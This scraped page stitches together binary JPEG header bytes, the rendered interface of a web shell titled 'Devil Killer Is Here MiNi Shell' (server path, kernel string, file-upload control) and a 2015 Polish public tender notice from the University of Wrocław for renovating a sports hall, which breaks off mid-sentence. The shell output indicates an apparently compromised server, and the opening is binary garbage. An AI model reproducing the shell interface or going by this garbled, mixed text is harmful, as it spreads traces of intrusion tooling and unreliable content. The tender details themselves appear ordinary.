JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150423/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150423/93642-N-2015.html

<p class="kh_header"><b>Wrocław: Remont i przebudowa Sali sportowej z zapleczem socjalnym przy ul. Kuźniczej 49/55 we Wrocławiu.</b><br>
<b>Numer ogłoszenia: 93642 - 2015; data zamieszczenia: 23.04.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet Wrocławski , pl. Uniwersytecki 1, 50-137 Wrocław, woj. dolnośląskie, tel. 071 3752234, faks 071 3752472.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.uni.wroc.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont i przebudowa Sali sportowej z zapleczem socjalnym przy ul. Kuźniczej 49/55 we Wrocławiu..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest robota budowlana obejmująca remont Sali sportowej z zapleczem socjalnym przy ul. Kuźniczej 49/55 we Wrocławiu.
Przedmiot zamówienia obejmuje:
Branżę budowlaną
1.	Roboty rozbiórkowe
2.	Odtworzenie warstw podkładowych posadzki zaplecza
3.	Roboty murowe
4.	Ścianki  w systemie suchej zabudowy 
5.	Tynki wewnętrzne, okładziny ścian	
6.	Roboty w zakresie stolarki budowlanej
7.	Posadzki w pomieszczeniach zaplecza
8.	Posadzka sportowa
9.	Sufity podwieszone
10.	Roboty malarskie
11.	Remont pokrycia dachowego
12.	Wyposażenie sali gimnastycznej i pomieszczeń zaplecza
Instalacje sanitarne
1.	Instalacje wentylacji mechanicznej
2.	Instalacja zasilania nagrzewnic AGW
3.	Instalacja c.o. 
4.	Instalacja wodociągowa 
5.	Kanalizacja sanitarna 
6.	Roboty demontażowe 
7.	Demontaż instalacji wod. kan.
8.	Demontaż instalacji c.o., c.t.
9.	Demontaż urządzeń wentylacyjnych
Instalacje elektryczne i teletechniczne
1.	Instalacje elektryczne silnoprądowe
-	Demontaże
-	Linia zasilająca od ZK do istniejącej TG
- Tablica rozdzielcza
-	Trasy kablowe
- Kable i przewody
-	Oprawy oświetleniowe
-	Osprzęt instalacyjny
-	Instalacja połączeń wyrównawczych 
2.	Instalacje elektryczne niskoprądowe 
- Instalacja systemu okablowania strukturalnego
-	Instalacja systemu nagłośnienia ogólnego
3.	Instalacje odgromowe - demontowane i ponownie montowane podczas prac dekarskich..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.11.00.00-1, 45.21.00.00-2, 45.31.00.00-3, 45.33.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 133.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca przystępujący do przetargu zobowiązany jest wnieść wadium w wysokości: 15 000,00 zł słownie złotych: piętnaście tysięcy.
2. Wadium może być wnoszone w jednej lub kilku następujących formach: 
a) pieniądzu,
b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c) gwarancjach bankowych,
d) gwarancjach ubezpieczeniowych,
e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości Dz. U. Nr 109, poz. 1158 ze zm.
3. W przypadku składania przez Wykonawcę wadium w formie gwarancji lub poręczeń, gwarancja musi być gwarancją bezwarunkową, nieodwołalną, wykonalną na terytorium Rzeczpospolitej Polskiej, sporządzoną zgodnie z obowiązującymi przepisami i powinna zawierać następujące elementy:
a) nazwę dającego zlecenie wykonawcy, beneficjenta gwarancji zamawiającego, gwaranta banku lub instytucji ubezpieczeniowej udzielających gwarancji oraz wskazanie ich siedzib;
b) kwotę gwarancji;
c) termin ważności gwarancji w formule: od dnia  do dnia
d)zobowiązanie gwaranta do zapłacenia kwoty gwarancji na pierwsze pisemne żądanie Zamawiającego w sytuacjach określonych w art. 46 ust. 4a oraz ust. 5 ustawy Pzp;
4. Wadium w formie pieniężnej należy wnieść przelewem na rachunek bankowy Uniwersytetu Wrocławskiego:
Bank Zachodni WBK S.A. IV O Wrocław
NR KONTA 12 1090 2503 0000 0001 1257 6100
z dopiskiem: 
wadium na postępowanie nr BZP.2422.3.2015.GK, 
Remont i przebudowa Sali sportowej z zapleczem socjalnym przy ul. Kuźniczej 49)55 we Wrocławiu.
5. Wadium w formie pieniężnej winno znaleźć się na wskazanym rachunku Zamawiającego do upływu składania terminu ofert. Wadium wniesione w pieniądzu uznaje się za wniesione z chwilą jego wpłynięcia na wskazane konto Zamawiającego. Dowód wpłaty należy przedstawić w formie dołączonej do oferty kserokopii potwierdzonej przez Wykonawcę za zgodność z oryginałem.
6. Pozostałe niepieniężne formy wadium, winny być złożone w oryginale w Kwesturze Uniwersytetu Wrocławskiego przy pl. Uniwersyteckim 1 we Wrocławiu (Dział Finansowy pok. Nr 108, I piętro, okienko nr 1) do upływu terminu składania ofert.  Kopię należy dołączyć do oferty.
7. Wadium musi zabezpieczać ofertę przez cały okres związania ofertą, począwszy od dnia, w którym upływa termin składania ofert.
8. Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem przypadku określonego w art. 46 ust. 4a ustawy.
9. Zamawiający zwraca wadium wykonawcy, którego oferta została wybrana jako najkorzystniejsza niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy. 
10. Zamawiający zwraca niezwłocznie wadium, na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert. 
11. Zamawiający żąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium na podstawie 46 ust. 1 ustawy, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez zamawiającego. 
12. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, z przyczyn leżących po jego stronie, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5, lub informacji o tym, że nie należy do grupy kapitałowej, lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3, co powodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej. 
13. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana: 
a) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie, 
b) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy, 
c) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy. 
14. Zasady wnoszenia wadium określone w niniejszym rozdziale dotyczą również przedłużania ważności wadium oraz wnoszenia nowego wadium w przypadkach określonych w ustawie. 
15. Zamawiający wykluczy z postępowania na podstawie art. 24 ust. 2 ustawy wykonawców, którzy nie wniosą wadium w określonym terminie i prawidłowej formie lub złożą wadliwe wadium, w tym również na przedłużony okres związania ofertą lub w sytuacji, o której mowa w art. 46 ust. 3 ustawy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy winni wykazać, że wykonali, zgodnie z zasadami sztuki budowlanej i prawidłowo ukończyli, w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie:
- co najmniej jedną należycie wykonaną robotę budowlaną o wartości brutto minimum 500 000,00 zł (pięćset tysięcy), która została wykonana w obiekcie o kubaturze minimalnej 1200m3 przy czym robota związana była z remontem lub przebudową obejmującą branżę konstrukcyjno - budowlaną, sanitarną i elektryczną,
lub
- co najmniej dwie należycie wykonane roboty budowlane o wartości brutto minimum 300 000,00 zł (trzysta tysięcy) każda i każda z nich została wykonana w obiekcie o kubaturze minimalnej 1200m3 i związane były z remontem lub przebudową obejmującą branżę konstrukcyjno - budowlaną, sanitarną i elektryczną,

Zamawiający zastrzega, że są to najważniejsze roboty budowlane, jakie powinien wykazać Wykonawca.
Do przeliczenia wartości występujących w innych walutach niż PLN Zamawiający jako kurs przeliczeniowy przyjmie średni kurs Narodowego Banku Polskiego (NBP), z dnia opublikowania ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych, przy czym średnie kursy walut dostępne są pod następującym adresem internetowym:
http://www.nbp.pl/home.aspx?f=/Kursy/kursy.html 
W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia na podstawie art. 23 ustawy Pzp, określony warunek jest spełniony, gdy spełnia go co najmniej jeden podmiot składający wspólną ofertę lub podmioty spełniają go łącznie.
Ocena spełnienia przedstawionego warunku zostanie dokonana w oparciu o przedłożone dokumenty i oświadczenia wg formuły spełnia - nie spełnia.
W celu potwierdzenia spełnienia niniejszego warunku Wykonawcy zobowiązani są przedłożyć dokumenty wymienione w rozdziale V w pkt 1 ppkt. 1 i 2 SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował:
-  kierownikiem budowy posiadającym co najmniej uprawnienia bez ograniczeń do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej - zgodnie z ustawą z dnia 7 lipca 1994 r. - Prawo Budowlane (tekst jednolity Dz. U. z 2013 r., poz. 1409 ze zm.) i Rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z dnia 16 maja 2006 r. nr 83 poz. 578) lub odpowiadające im, ważne uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów lub którego odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych;

- 	kierownikiem robót elektrycznych posiadającym co najmniej uprawnienia budowlane bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych (zgodne z Rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie Dz. U. z dnia 16 maja 2006 r. nr 83 poz. 578) lub odpowiadające im równoważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów) - art. 12 ust. 2 z uwzględnieniem art. 104 ustawy z dnia 7 lipca 1994r. - Prawo budowlane (tekst jednolity Dz. U. z 2013 r., poz. 1409 ze zm.), odpowiednio w zakresie instalacji elektrycznych. 

- kierownikiem robót sanitarnych posiadającym co najmniej uprawnienia budowlane bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych (zgodne z Rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie Dz. U. z dnia 16 maja 2006 r. nr 83 poz. 578) lub odpowiadające im równoważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów) - art. 12 ust. 2 z uwzględnieniem art. 104 ustawy z dnia 7 lipca 1994r. - Prawo budowlane (tekst jednolity Dz. U. z 2013 r., poz. 1409 ze zm.), odpowiednio w zakresie instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych. 


Ocena spełnienia przedstawionego warunku zostanie dokonana w oparciu o przedłożone dokumenty i oświadczenia wg formuły spełnia - nie spełnia.
W celu potwierdzenia spełnienia niniejszego warunku Wykonawcy zobowiązani są przedłożyć dokumenty wymienione w rozdziale V w pkt 1 ppkt. 1, 3 i 4 SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>- co najmniej jedną należycie wykonaną robotę budowlaną o wartości brutto minimum 500 000,00 zł (pięćset tysięcy), która została wykonana w obiekcie o kubaturze minimalnej 1200m3 przy czym robota związana była z remontem lub przebudową obejmującą branżę konstrukcyjno - budowlaną, sanitarną i elektryczną,
lub
- co najmniej dwie należycie wykonane roboty budowlane o wartości brutto minimum 300 000,00 zł (trzysta tysięcy) każda i każda z nich została wykonana w obiekcie o kubaturze minimalnej 1200m3 i związane były z remontem lub przebudową obejmującą branżę konstrukcyjno - budowlaną, sanitarną i elektryczną,;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Inne dokumenty:
1)	 Formularz Oferty (załącznik nr 1 do SIWZ);
2)	 Kosztorys ofertowy;
3)	 Dowód wniesienia wadium;
4)	 Pełnomocnictwo dla osoby/osób podpisującej/cych ofertę do podejmowania zobowiązań w imieniu wykonawcy składającego ofertę, gdy prawo do podpisania oferty nie wynika z innych dokumentów do niej załączonych - w formie oryginału lub kserokopii potwierdzonej za zgodność z oryginałem przez notariusza;
5)	 W przypadku złożenia oferty wspólnej przez kilku Wykonawców, należy przedstawić pełnomocnictwo - w formie oryginału lub kserokopii potwierdzonej za zgodność z oryginałem przez notariusza, ustanawiające pełnomocnika do reprezentowania Wykonawców w postępowaniu o udzielenie zamówienia niniejszego zamówienia albo reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Treść pełnomocnictwa powinna wskazywać rodzaj uprawnień, do których upoważniony jest pełnomocnik;
6)	 Jeżeli Wykonawca polegać będzie na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia (w formie oryginału albo kopii poświadczonej za zgodność z oryginałem przez notariusza).
Z zobowiązania lub innych dokumentów potwierdzających udostępnienie zasobów przez inne podmioty musi bezspornie i jednoznacznie wynikać w szczególności: 
a) zakres dostępnych wykonawcy zasobów innego podmiotu, 
b) sposób wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu zamówienia, 
c) charakter stosunku, jaki będzie łączył wykonawcę z innym podmiotem, 
d) zakres i okres udziału innego podmiotu przy wykonywaniu zamówienia. 
2.	 W przypadku złożenia wspólnej oferty przez kilka podmiotów, każdy z nich zobowiązany jest przedstawić dokumenty i oświadczenia wystawione na niego w celu wykazania braku podstaw do wykluczenia z postępowania w tym dokumenty dotyczące przynależności do tej samej grupy kapitałowej.  Pozostałe dokumenty i oświadczenia podmioty składają wspólnie, tj. warunki w nich określone są spełnione, gdy spełnia je jeden podmiot składający wspólną ofertę lub podmioty spełniają je łącznie.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 75</li>
<li>2 - Termin realizacji robót (dni) - 15</li>
<li>3 - Okres rękojmi i gwarancji na wykonane roboty (dni) - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.  Ze względów losowych dopuszcza się zmianę przedstawicieli Wykonawcy, posiadających 
     wskazane w Umowie kwalifikacje.
2.  Ze względów organizacyjnych leżących po stronie Wykonawcy dopuszcza się całkowitą      
     rezygnację ze zgłoszonych Podwykonawców oraz zmianę zgłoszonych przez 
     Wykonawcę Podwykonawców w trakcie realizacji Umowy, wymienionych w § 4 Umowy*.
3.  Zgodnie z art.144 ust.1 Ustawy PZP przewiduje się zmianę sposobu wykonania przedmiotu 
     Umowy, gdy:
     a) Wykonawca dokona zmiany zgłoszonego w ofercie zakresu rzeczowego wykonywanego 
     przy udziale Podwykonawcy, z zachowaniem terminu wykonania przedmiotu Umowy,
     b) Wykonawca dokona zmiany Podwykonawcy lub zrezygnuje z Podwykonawcy, przy 
     czym, w przypadku gdy Wykonawca w celu wykazania spełnienia warunków udziału
     w postępowaniu, powoływał się na zasoby tego Podwykonawcy na zasadach określonych 
     w art.26 ust.2b ustawy PZP, Wykonawca jest zobowiązany wykazać Zamawiającemu, 
